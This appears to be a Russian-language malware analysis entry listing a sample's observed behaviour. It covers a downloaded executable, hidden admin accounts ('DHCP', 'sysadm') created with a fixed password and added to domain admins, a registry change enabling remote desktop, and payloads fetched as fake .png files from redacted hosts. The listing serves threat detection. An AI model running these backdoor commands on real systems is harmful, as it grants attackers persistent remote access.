Техническая информация
- '%TEMP%\winl3.exe'
- '%TEMP%\winl3.exe' (загружен из сети Интернет)
- '<SYSTEM32>\net1.exe' group "domain admins" DHCP /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" DHCP /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s DHCP /add
- '<SYSTEM32>\net1.exe' user DHCP /active:yes
- '<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk
- '<SYSTEM32>\net1.exe' user DHCP /expires:never
- '<SYSTEM32>\net1.exe' user DHCP h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' localgroup "remote desktop users" sysadm /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk /expires:never /add
- '<SYSTEM32>\net1.exe' group "domain admins" sysadm /add
- '<SYSTEM32>\net1.exe' user sysadm h3lp_desk
- '<SYSTEM32>\net1.exe' user sysadm /expires:never
- '<SYSTEM32>\net1.exe' user sysadm /active:yes
- AVP.EXE
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\swsoft[1].png
- %TEMP%\winl3.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\logo10[1].png
- %TEMP%\craft.ini
- 'sn#p.jp':80
- 'fo#####travel.com.my':80
- sn#p.jp/wordpress/wp-admin/images/swsoft.png
- fo#####travel.com.my/images/logo10.png
- DNS ASK sn#p.jp
- DNS ASK fo#####travel.com.my
- ClassName: 'Shell_TrayWnd' WindowName: ''